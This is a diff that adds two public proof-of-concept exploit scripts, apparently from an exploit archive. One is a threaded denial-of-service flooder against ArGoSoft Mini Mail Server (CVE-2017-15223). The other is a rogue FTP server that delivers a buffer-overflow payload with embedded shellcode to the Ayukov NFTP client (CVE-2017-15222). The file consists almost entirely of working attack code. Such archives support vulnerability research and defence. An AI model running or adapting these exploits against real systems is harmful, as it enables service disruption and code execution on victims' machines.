b/platforms/windows/dos/43026.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python +# coding: utf-8 + +############ Description: ########## +# The vulnerability was discovered during a vulnerability research lecture. +# +# Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2 +# and earlier allows remote attackers to waste CPU resources (memory +# consumption) via unspecified vectors. +#################################### + +# Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption) +# Date: 2017-10-21 +# Exploit Author: Berk Cem Göksel +# Contact: twitter.com/berkcgoksel || bgoksel.com +# Vendor Homepage: http://www.argosoft.com +# Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx +# Version: 1.0.0.2 +# Tested on: Windows 10 +# Category: Windows Remote Denial-of-Service +# CVE : CVE-2017-15223 + + +import socket +from threading import Thread + +def data(): + + ip = '127.0.0.1' + port = 25 + counter = 50 + string = '&' + + while True: + try: + if counter >= 10000: + counter = 0 + else: + + counter = counter + 50 + A = (string * counter) + 'user2@othermail.com' + print "String lenght: " + str(len(A)) + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5.0) + sock.connect((ip, port)) + sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n') + sock.recv(1024) + sock.close() + + except Exception as e: + continue + +def main(): + iterations = int(input("Threads: ")) + for i in range(iterations): + t = Thread(target=data) + t.start() + +if __name__ == '__main__': + main() + diff --git a/platforms/windows/remote/43025.py b/platforms/windows/remote/43025.py new file mode 100755 index 000000000..4c6a8b881 --- /dev/null +++ b/platforms/windows/remote/43025.py @@ -0,0 +1,69 @@ +#!/usr/bin/env python +# coding: utf-8 + +############ Description: ########## +# The vulnerability was discovered during a vulnerability research lecture. +# This is meant to be a PoC. +#################################### + +# Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow +# Date: 2017-10-21 +# Exploit Author: Berk Cem Göksel +# Contact: twitter.com/berkcgoksel || bgoksel.com +# Vendor Homepage: http://ayukov.com/nftp/source-release.html +# Software Link: ftp://ftp.ayukov.com/pub/nftp/ +# Version: v1.71, v1.72, v1.8, v2.0 +# Tested on: Windows 10 +# Category: Windows Remote Exploit +# CVE : CVE-2017-15222 + +import socket + +IP = '127.0.0.1' +port = 21 + + +#(exec calc.exe) +shellcode=( +"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1" +"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5" +"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b" +"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd" +"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb" +"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08" +"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64" +"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33" +"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5" +"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b" +"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98" +"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43" +"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53" +"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f" +"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea" +"\x51\x58") + +CALL_ESP = "\xdd\xfc\x40\x00" # call esp - nftpc.exe #0040FCDD +buff = "A" * 4116 + CALL_ESP + '\x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode)) +#Can call esp but the null byte terminates the string. + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((IP, port)) + s.listen(20) + print("[i] FTP Server started on port: "+str(port)+"\r\n") +except: + print("[!] Failed to bind the server to port: "+str(port)+"\r\n") + +while True: + conn, addr = s.accept() + conn.send('220 Welcome!' + '\r\n') + print conn.recv(1024) + conn.send('331 OK.\r\n') + print conn.recv(1024) + conn.send('230 OK.\r\n') + print conn.recv(1024) + conn.send(buff + '\r\n') + print conn.recv(1024) + conn.send('257' + '\r\n') + +